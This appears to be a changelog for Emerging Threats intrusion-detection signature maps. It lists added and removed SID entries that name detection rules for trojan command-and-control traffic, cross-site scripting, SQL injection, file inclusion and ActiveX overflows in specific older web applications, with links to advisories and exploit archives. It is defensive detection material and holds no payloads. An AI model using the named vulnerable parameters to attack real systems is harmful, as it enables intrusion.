url,doc.emergingthreats.net/2009712 2009713 || ET CURRENT Possible W32/Dozer Trojan Backdoor CnC Communication Detected || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Dozer || url,doc.emergingthreats.net/2009713 || url,myitforum.com/cs2/blogs/cmosby/archive/2009/07/22/born-on-the-4th-of-july-symantec-security-blogs.aspx || url,www.symantec.com/norton/security_response/writeup.jsp?docid=2009-070814-5311-99&tabid=2 2009714 || ET WEB Script tag in URI, Possible Cross Site Scripting Attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_CSS || url,doc.emergingthreats.net/2009714 || url,ha.ckers.org/xss.html 2009715 || ET WEB Onmouseover= in URI - Likely Cross Site Scripting Attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_CSS || url,doc.emergingthreats.net/2009715 || url,www.w3schools.com/jsref/jsref_onmouseover.asp 2009716 || ET WEB_SPECIFIC ECShop user.php order_sn Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_ECShop || url,doc.emergingthreats.net/2009716 || url,milw0rm.com/exploits/8548 || bugtraq,34733 2009717 || ET WEB_SPECIFIC 1024 CMS standard.php page_include Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_1024CMS || url,doc.emergingthreats.net/2009717 || url,milw0rm.com/exploits/8003 || url,vupen.com/english/advisories/2009/0360 2009718 || ET WEB_SPECIFIC AvailScript Photo Album Script pics.php sid Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_AvailScript || url,doc.emergingthreats.net/2009718 || url,milw0rm.com/exploits/6411 || bugtraq,31085 2009719 || ET WEB_SPECIFIC pHNews comments.php templates_dir Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_pHNews || url,doc.emergingthreats.net/2009719 || bugtraq,19838 || url,milw0rm.com/exploits/6000 2009720 || ET WEB_SPECIFIC 
pHNews comments.php template Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_pHNews || url,doc.emergingthreats.net/2009720 || bugtraq,19838 || url,milw0rm.com/exploits/6000 2009723 || ET WEB_SPECIFIC QuickTeam qte_web.php qte_web_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_QuickTeam || url,doc.emergingthreats.net/2009723 || url,milw0rm.com/exploits/8602 || url,secunia.com/advisories/34997/ 2009724 || ET WEB_SPECIFIC QuickTeam qte_init.php qte_root Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_QuickTeam || url,doc.emergingthreats.net/2009724 || url,milw0rm.com/exploits/8602 || url,secunia.com/advisories/34997/ 2009725 || ET WEB_ACTIVEX Roxio CinePlayer SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Roxio || url,doc.emergingthreats.net/2009725 || bugtraq,23412 || url,milw0rm.com/exploits/8824 2009726 || ET WEB_SPECIFIC TotalCalendar config.php inc_dir Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_TotalCalendar || url,doc.emergingthreats.net/2009726 || url,milw0rm.com/exploits/8494 || bugtraq,34617 2009727 || ET WEB_SPECIFIC Scripts For Sites EZ e-store searchresults.php where Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_ScriptsforSites || url,doc.emergingthreats.net/2009727 || url,milw0rm.com/exploits/6922 || bugtraq,32039 || cve,CVE-2008-6242 2009728 || ET WEB_SPECIFIC NotFTP config.php languages Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_NotFTP || url,doc.emergingthreats.net/2009728 || bugtraq,34636 || url,milw0rm.com/exploits/8504 2009729 || ET WEB_SPECIFIC TotalCalendar cms_detect.php include Parameter Local File Inclusion || 
url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_TotalCalendar || url,doc.emergingthreats.net/2009729 || bugtraq,34634 || url,milw0rm.com/exploits/8503 2009730 || ET WEB_SPECIFIC JobHut browse.php pk Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_JobHunt || url,doc.emergingthreats.net/2009730 || url,milw0rm.com/exploits/8318 || bugtraq,34300 2009731 || ET WEB_SPECIFIC VS Panel showcat.php Cat_ID Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_VSPanel || url,doc.emergingthreats.net/2009731 || url,milw0rm.com/exploits/8506 || bugtraq,34648 2009733 || ET WEB_SPECIFIC Golabi index_logged.php cur_module Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Golabi || url,doc.emergingthreats.net/2009733 || bugtraq,33916 || url,vupen.com/english/advisories/2009/0553 || url,milw0rm.com/exploits/8112 2009734 || ET WEB_SPECIFIC 212cafe Board view.php qID Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_212Board || url,doc.emergingthreats.net/2009734 || url,milw0rm.com/exploits/6578 || url,xforce.iss.net/xforce/xfdb/45428 || bugtraq,31426 2009735 || ET WEB_ACTIVEX Roxio CinePlayer IAManager.dll ActiveX Control Buffer Overflow || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Roxio || url,doc.emergingthreats.net/2009735 || url,milw0rm.com/exploits/8835 || url,xforce.iss.net/xforce/xfdb/50868 2009736 || ET WEB_SPECIFIC ProjectCMS select_image.php dir Parameter Directory Traversal || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_ProjectCMS || url,doc.emergingthreats.net/2009736 || bugtraq,34816 || url,milw0rm.com/exploits/8608 2009737 || ET WEB_SPECIFIC ProjectCMS admin_theme_remove.php file Parameter Remote Directory Delete || 
url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_ProjectCMS || url,doc.emergingthreats.net/2009737 || bugtraq,34816 || url,milw0rm.com/exploits/8608 2009738 || ET WEB_SPECIFIC X-BLC get_read.php section Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_XBLC || url,doc.emergingthreats.net/2009738 || bugtraq,34197 || url,milw0rm.com/exploits/8258 2009739 || ET WEB_SPECIFIC DMXReady Multiple Products upload_image_category.asp cid Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_DMXReady || url,doc.emergingthreats.net/2009739 || url,milw0rm.com/exploits/7767 || url,xforce.iss.net/xforce/xfdb/47959 || bugtraq,33253 2009740 || ET WEB_SPECIFIC BibCiter projects.php idp Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_BibCiter || url,doc.emergingthreats.net/2009740 || url,milw0rm.com/exploits/7814 || bugtraq,33329 || url,secunia.com/advisories/33555 2009741 || ET WEB_SPECIFIC BibCiter contacts.php idc Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_BibCiter || url,doc.emergingthreats.net/2009741 || url,milw0rm.com/exploits/7814 || bugtraq,33329 || url,secunia.com/advisories/33555 2009742 || ET WEB_SPECIFIC BibCiter users.php idu Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_BibCiter || url,doc.emergingthreats.net/2009742 || url,milw0rm.com/exploits/7814 || bugtraq,33329 || url,secunia.com/advisories/33555 2009743 || ET WEB_SPECIFIC phpDatingClub website.php page Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_PHPDating || url,doc.emergingthreats.net/2009743 || url,milw0rm.com/exploits/6037 || bugtraq,30176 2009744 || ET WEB_SPECIFIC SuperNews valor.php noticia Parameter SQL Injection || 
url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_SuperNews || url,doc.emergingthreats.net/2009744 || bugtraq,34195 || url,milw0rm.com/exploits/8255 2009745 || ET WEB_SPECIFIC Flatchat pmscript.php with Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Flatchat || url,doc.emergingthreats.net/2009745 || bugtraq,34734 || url,milw0rm.com/exploits/8549 2009746 || ET WEB_SPECIFIC QuickTeam qte_web.php qte_web_path Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_QuickTeam || url,doc.emergingthreats.net/2009746 || url,milw0rm.com/exploits/8602 || url,secunia.com/advisories/34997/ 2009747 || ET WEB_SPECIFIC AvailScript Article Script articles.php aIDS Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_AvailScript || url,doc.emergingthreats.net/2009747 || url,milw0rm.com/exploits/6409 || url,secunia.com/advisories/31816/ || cve,CVE-2008-4371 2009748 || ET WEB Possible Wordpress Administrative Password Reset Vulnerability || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Wordpress || url,doc.emergingthreats.net/2009748 || url,www.securitytracker.com/alerts/2009/Aug/1022707.html 2009749 || ET SCAN Unusually Fast 403 Error Messages, Possible Web Application Scan || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_403 || url,doc.emergingthreats.net/2009749 || url,www.checkupdown.com/status/E403.html -> Added to emerging-sid-msg.map.txt (42): 2001239 || ET POLICY Cisco Device in Config Mode || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Cisco || url,doc.emergingthreats.net/bin/view/Main/2001239 2001240 || ET POLICY Cisco Device New Config Built || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Cisco || url,doc.emergingthreats.net/bin/view/Main/2001240 2002801 || ET POLICY Google Desktop User-Agent Detected || 
url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Google || url,doc.emergingthreats.net/2002801 || url,news.com.com/2100-1032_3-6038197.html 2002838 || ET POLICY Google Search Appliance browsing the Internet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Google || url,doc.emergingthreats.net/2002838 || url,www.google.com/enterprise/gsa/index.html 2002849 || ET WEB_SPECIFIC Google Appliance External Proxy Stylesheet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002849 || cve,2005-3758 || bugtraq,15509 2003634 || ET WEB_SPECIFIC Suspicious User-Agent - get-minimal - Possible Vuln Scan || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_Get-minimal_UA || url,doc.emergingthreats.net/2003634 2009711 || ET TROJAN Win32.Runner (Often Rootkit) - POST || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Runner || url,doc.emergingthreats.net/2009711 || url,www.threatexpert.com/threats/trojan-win32-runner.html || url,www.spywarecease.com/spyware-list/Spyware_Trojan.Win32.Runner.s.html 2009712 || ET MALWARE Adware PlusDream - GET Config Download/Update || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/MALWARE/MALWARE_PlusDream || url,doc.emergingthreats.net/2009712 2009713 || ET CURRENT Possible W32/Dozer Trojan Backdoor CnC Communication Detected || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Dozer || url,doc.emergingthreats.net/2009713 || url,myitforum.com/cs2/blogs/cmosby/archive/2009/07/22/born-on-the-4th-of-july-symantec-security-blogs.aspx || url,www.symantec.com/norton/security_response/writeup.jsp?docid=2009-070814-5311-99&tabid=2 2009714 || ET WEB Script tag in URI, Possible Cross Site Scripting Attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_CSS || url,doc.emergingthreats.net/2009714 || url,ha.ckers.org/xss.html 2009715 || ET WEB Onmouseover= in URI - Likely Cross Site 
Scripting Attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_CSS || url,doc.emergingthreats.net/2009715 || url,www.w3schools.com/jsref/jsref_onmouseover.asp 2009716 || ET WEB_SPECIFIC ECShop user.php order_sn Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_ECShop || url,doc.emergingthreats.net/2009716 || url,milw0rm.com/exploits/8548 || bugtraq,34733 2009717 || ET WEB_SPECIFIC 1024 CMS standard.php page_include Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_1024CMS || url,doc.emergingthreats.net/2009717 || url,milw0rm.com/exploits/8003 || url,vupen.com/english/advisories/2009/0360 2009718 || ET WEB_SPECIFIC AvailScript Photo Album Script pics.php sid Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_AvailScript || url,doc.emergingthreats.net/2009718 || url,milw0rm.com/exploits/6411 || bugtraq,31085 2009719 || ET WEB_SPECIFIC pHNews comments.php templates_dir Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_pHNews || url,doc.emergingthreats.net/2009719 || bugtraq,19838 || url,milw0rm.com/exploits/6000 2009720 || ET WEB_SPECIFIC pHNews comments.php template Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_pHNews || url,doc.emergingthreats.net/2009720 || bugtraq,19838 || url,milw0rm.com/exploits/6000 2009723 || ET WEB_SPECIFIC QuickTeam qte_web.php qte_web_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_QuickTeam || url,doc.emergingthreats.net/2009723 || url,milw0rm.com/exploits/8602 || url,secunia.com/advisories/34997/ 2009724 || ET WEB_SPECIFIC QuickTeam qte_init.php qte_root Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_QuickTeam || 
url,doc.emergingthreats.net/2009724 || url,milw0rm.com/exploits/8602 || url,secunia.com/advisories/34997/ 2009725 || ET WEB_ACTIVEX Roxio CinePlayer SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Roxio || url,doc.emergingthreats.net/2009725 || bugtraq,23412 || url,milw0rm.com/exploits/8824 2009726 || ET WEB_SPECIFIC TotalCalendar config.php inc_dir Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_TotalCalendar || url,doc.emergingthreats.net/2009726 || url,milw0rm.com/exploits/8494 || bugtraq,34617 2009727 || ET WEB_SPECIFIC Scripts For Sites EZ e-store searchresults.php where Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_ScriptsforSites || url,doc.emergingthreats.net/2009727 || url,milw0rm.com/exploits/6922 || bugtraq,32039 || cve,CVE-2008-6242 2009728 || ET WEB_SPECIFIC NotFTP config.php languages Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_NotFTP || url,doc.emergingthreats.net/2009728 || bugtraq,34636 || url,milw0rm.com/exploits/8504 2009729 || ET WEB_SPECIFIC TotalCalendar cms_detect.php include Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_TotalCalendar || url,doc.emergingthreats.net/2009729 || bugtraq,34634 || url,milw0rm.com/exploits/8503 2009730 || ET WEB_SPECIFIC JobHut browse.php pk Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_JobHunt || url,doc.emergingthreats.net/2009730 || url,milw0rm.com/exploits/8318 || bugtraq,34300 2009731 || ET WEB_SPECIFIC VS Panel showcat.php Cat_ID Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_VSPanel || url,doc.emergingthreats.net/2009731 || url,milw0rm.com/exploits/8506 || bugtraq,34648 2009733 || ET 
WEB_SPECIFIC Golabi index_logged.php cur_module Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Golabi || url,doc.emergingthreats.net/2009733 || bugtraq,33916 || url,vupen.com/english/advisories/2009/0553 || url,milw0rm.com/exploits/8112 2009734 || ET WEB_SPECIFIC 212cafe Board view.php qID Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_212Board || url,doc.emergingthreats.net/2009734 || url,milw0rm.com/exploits/6578 || url,xforce.iss.net/xforce/xfdb/45428 || bugtraq,31426 2009735 || ET WEB_ACTIVEX Roxio CinePlayer IAManager.dll ActiveX Control Buffer Overflow || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Roxio || url,doc.emergingthreats.net/2009735 || url,milw0rm.com/exploits/8835 || url,xforce.iss.net/xforce/xfdb/50868 2009736 || ET WEB_SPECIFIC ProjectCMS select_image.php dir Parameter Directory Traversal || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_ProjectCMS || url,doc.emergingthreats.net/2009736 || bugtraq,34816 || url,milw0rm.com/exploits/8608 2009737 || ET WEB_SPECIFIC ProjectCMS admin_theme_remove.php file Parameter Remote Directory Delete || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_ProjectCMS || url,doc.emergingthreats.net/2009737 || bugtraq,34816 || url,milw0rm.com/exploits/8608 2009738 || ET WEB_SPECIFIC X-BLC get_read.php section Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_XBLC || url,doc.emergingthreats.net/2009738 || bugtraq,34197 || url,milw0rm.com/exploits/8258 2009739 || ET WEB_SPECIFIC DMXReady Multiple Products upload_image_category.asp cid Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_DMXReady || url,doc.emergingthreats.net/2009739 || url,milw0rm.com/exploits/7767 || url,xforce.iss.net/xforce/xfdb/47959 || bugtraq,33253 2009740 || ET 
WEB_SPECIFIC BibCiter projects.php idp Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_BibCiter || url,doc.emergingthreats.net/2009740 || url,milw0rm.com/exploits/7814 || bugtraq,33329 || url,secunia.com/advisories/33555 2009741 || ET WEB_SPECIFIC BibCiter contacts.php idc Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_BibCiter || url,doc.emergingthreats.net/2009741 || url,milw0rm.com/exploits/7814 || bugtraq,33329 || url,secunia.com/advisories/33555 2009742 || ET WEB_SPECIFIC BibCiter users.php idu Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_BibCiter || url,doc.emergingthreats.net/2009742 || url,milw0rm.com/exploits/7814 || bugtraq,33329 || url,secunia.com/advisories/33555 2009743 || ET WEB_SPECIFIC phpDatingClub website.php page Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_PHPDating || url,doc.emergingthreats.net/2009743 || url,milw0rm.com/exploits/6037 || bugtraq,30176 2009744 || ET WEB_SPECIFIC SuperNews valor.php noticia Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_SuperNews || url,doc.emergingthreats.net/2009744 || bugtraq,34195 || url,milw0rm.com/exploits/8255 2009745 || ET WEB_SPECIFIC Flatchat pmscript.php with Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Flatchat || url,doc.emergingthreats.net/2009745 || bugtraq,34734 || url,milw0rm.com/exploits/8549 2009746 || ET WEB_SPECIFIC QuickTeam qte_web.php qte_web_path Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_QuickTeam || url,doc.emergingthreats.net/2009746 || url,milw0rm.com/exploits/8602 || url,secunia.com/advisories/34997/ 2009747 || ET WEB_SPECIFIC AvailScript Article Script articles.php aIDS Parameter 
SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_AvailScript || url,doc.emergingthreats.net/2009747 || url,milw0rm.com/exploits/6409 || url,secunia.com/advisories/31816/ || cve,CVE-2008-4371 2009748 || ET WEB Possible Wordpress Administrative Password Reset Vulnerability || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Wordpress || url,doc.emergingthreats.net/2009748 || url,www.securitytracker.com/alerts/2009/Aug/1022707.html 2009749 || ET SCAN Unusually Fast 403 Error Messages, Possible Web Application Scan || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_403 || url,doc.emergingthreats.net/2009749 || url,www.checkupdown.com/status/E403.html -> Added to emerging-web_sql_injection.rules (1): #by Blake Hartstein of Demarc [---] Removed non-rule lines: [---] -> Removed from emerging-policy.rules (1): #by Blake Hartstein of Demarc -> Removed from emerging-sid-msg.map (86): 2001239 || ET Cisco Device in Config Mode || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Cisco || url,doc.emergingthreats.net/bin/view/Main/2001239 2001240 || ET Cisco Device New Config Built || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Cisco || url,doc.emergingthreats.net/bin/view/Main/2001240 2002801 || ET POLICY Google Desktop User-Agent Detected || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002801 || url,news.com.com/2100-1032_3-6038197.html 2002838 || ET POLICY Google Search Appliance browsing the Internet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002838 || url,www.google.com/enterprise/gsa/index.html 2002849 || ET POLICY Google Appliance External Proxy Stylesheet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002849 || cve,2005-3758 || bugtraq,15509 2003634 || ET 
WEB_SPECIFIC Suspicious User-Agent - get-minimal - Possible Vuln Scan || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_get-minimal_UA || url,doc.emergingthreats.net/2003634 2009711 || ET TROJAN Win32.Runner (Often Rootkit) - POST || url,www.threatexpert.com/threats/trojan-win32-runner.html || url,www.spywarecease.com/spyware-list/Spyware_Trojan.Win32.Runner.s.html 2009712 || ET MALWARE Adware PlusDream - GET Config Download/Update 2009713 || ET CURRENT Possible W32/Dozer Trojan Backdoor CnC Communication Detected || url,myitforum.com/cs2/blogs/cmosby/archive/2009/07/22/born-on-the-4th-of-july-symantec-security-blogs.aspx || url,www.symantec.com/norton/security_response/writeup.jsp?docid=2009-070814-5311-99&tabid=2 2009714 || ET WEB Script tag in URI, Possible Cross Site Scripting Attempt || url,ha.ckers.org/xss.html 2009715 || ET WEB Onmouseover= in URI - Likely Cross Site Scripting Attempt || url,www.w3schools.com/jsref/jsref_onmouseover.asp 2009716 || ET WEB_SPECIFIC ECShop user.php order_sn Parameter SQL Injection || url,milw0rm.com/exploits/8548 || bugtraq,34733 2009717 || ET WEB_SPECIFIC 1024 CMS standard.php page_include Parameter Remote File Inclusion || url,milw0rm.com/exploits/8003 || url,vupen.com/english/advisories/2009/0360 2009718 || ET WEB_SPECIFIC AvailScript Photo Album Script pics.php sid Parameter SQL Injection || url,milw0rm.com/exploits/6411 || bugtraq,31085 2009719 || ET WEB_SPECIFIC pHNews comments.php templates_dir Local File Inclusion || bugtraq,19838 || url,milw0rm.com/exploits/6000 2009720 || ET WEB_SPECIFIC pHNews comments.php template Local File Inclusion || bugtraq,19838 || url,milw0rm.com/exploits/6000 2009723 || ET WEB_SPECIFIC QuickTeam qte_web.php qte_web_path Parameter Remote File Inclusion || url,milw0rm.com/exploits/8602 || url,secunia.com/advisories/34997/ 2009724 || ET WEB_SPECIFIC QuickTeam qte_init.php qte_root Parameter Local File Inclusion || url,milw0rm.com/exploits/8602 || 
url,secunia.com/advisories/34997/ 2009725 || ET WEB_ACTIVEX Roxio CinePlayer SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow || bugtraq,23412 || url,milw0rm.com/exploits/8824 2009726 || ET WEB_SPECIFIC TotalCalendar config.php inc_dir Parameter Local File Inclusion || url,milw0rm.com/exploits/8494 || bugtraq,34617 2009727 || ET WEB_SPECIFIC Scripts For Sites EZ e-store searchresults.php where Parameter SQL Injection || url,milw0rm.com/exploits/6922 || bugtraq,32039 || cve,CVE-2008-6242 2009728 || ET WEB_SPECIFIC NotFTP config.php languages Parameter Local File Inclusion || bugtraq,34636 || url,milw0rm.com/exploits/8504 2009729 || ET WEB_SPECIFIC TotalCalendar cms_detect.php include Parameter Local File Inclusion || bugtraq,34634 || url,milw0rm.com/exploits/8503 2009730 || ET WEB_SPECIFIC JobHut browse.php pk Parameter SQL Injection || url,milw0rm.com/exploits/8318 || bugtraq,34300 2009731 || ET WEB_SPECIFIC VS Panel showcat.php Cat_ID Parameter SQL Injection || url,milw0rm.com/exploits/8506 || bugtraq,34648 2009733 || ET WEB_SPECIFIC Golabi index_logged.php cur_module Parameter Remote File Inclusion || bugtraq,33916 || url,vupen.com/english/advisories/2009/0553 || url,milw0rm.com/exploits/8112 2009734 || ET WEB_SPECIFIC 212cafe Board view.php qID Parameter SQL Injection || url,milw0rm.com/exploits/6578 || url,xforce.iss.net/xforce/xfdb/45428 || bugtraq,31426 2009735 || ET WEB_ACTIVEX Roxio CinePlayer IAManager.dll ActiveX Control Buffer Overflow || url,milw0rm.com/exploits/8835 || url,xforce.iss.net/xforce/xfdb/50868 2009736 || ET WEB_SPECIFIC ProjectCMS select_image.php dir Parameter Directory Traversal || bugtraq,34816 || url,milw0rm.com/exploits/8608 2009737 || ET WEB_SPECIFIC ProjectCMS admin_theme_remove.php file Parameter Remote Directory Delete || bugtraq,34816 || url,milw0rm.com/exploits/8608 2009738 || ET WEB_SPECIFIC X-BLC get_read.php section Parameter SQL Injection || bugtraq,34197 || url,milw0rm.com/exploits/8258 2009739 || ET WEB_SPECIFIC 
DMXReady Multiple Products upload_image_category.asp cid Parameter SQL Injection || url,milw0rm.com/exploits/7767 || url,xforce.iss.net/xforce/xfdb/47959 || bugtraq,33253 2009740 || ET WEB_SPECIFIC BibCiter projects.php idp Parameter SQL Injection || url,milw0rm.com/exploits/7814 || bugtraq,33329 || url,secunia.com/advisories/33555 2009741 || ET WEB_SPECIFIC BibCiter contacts.php idc Parameter SQL Injection || url,milw0rm.com/exploits/7814 || bugtraq,33329 || url,secunia.com/advisories/33555 2009742 || ET WEB_SPECIFIC BibCiter users.php idu Parameter SQL Injection || url,milw0rm.com/exploits/7814 || bugtraq,33329 || url,secunia.com/advisories/33555 2009743 || ET WEB_SPECIFIC phpDatingClub website.php page Parameter Local File Inclusion || url,milw0rm.com/exploits/6037 || bugtraq,30176 2009744 || ET WEB_SPECIFIC SuperNews valor.php noticia Parameter SQL Injection || bugtraq,34195 || url,milw0rm.com/exploits/8255 2009745 || ET WEB_SPECIFIC Flatchat pmscript.php with Parameter Local File Inclusion || bugtraq,34734 || url,milw0rm.com/exploits/8549 2009746 || ET WEB_SPECIFIC QuickTeam qte_web.php qte_web_path Parameter Local File Inclusion || url,milw0rm.com/exploits/8602 || url,secunia.com/advisories/34997/ 2009747 || ET WEB_SPECIFIC AvailScript Article Script articles.php aIDS Parameter SQL Injection || url,milw0rm.com/exploits/6409 || url,secunia.com/advisories/31816/ || cve,CVE-2008-4371 2009748 || ET WEB Possible Wordpress Administrative Password Reset Vulnerability || url,www.securitytracker.com/alerts/2009/Aug/1022707.html 2009749 || ET SCAN Unusually Fast 403 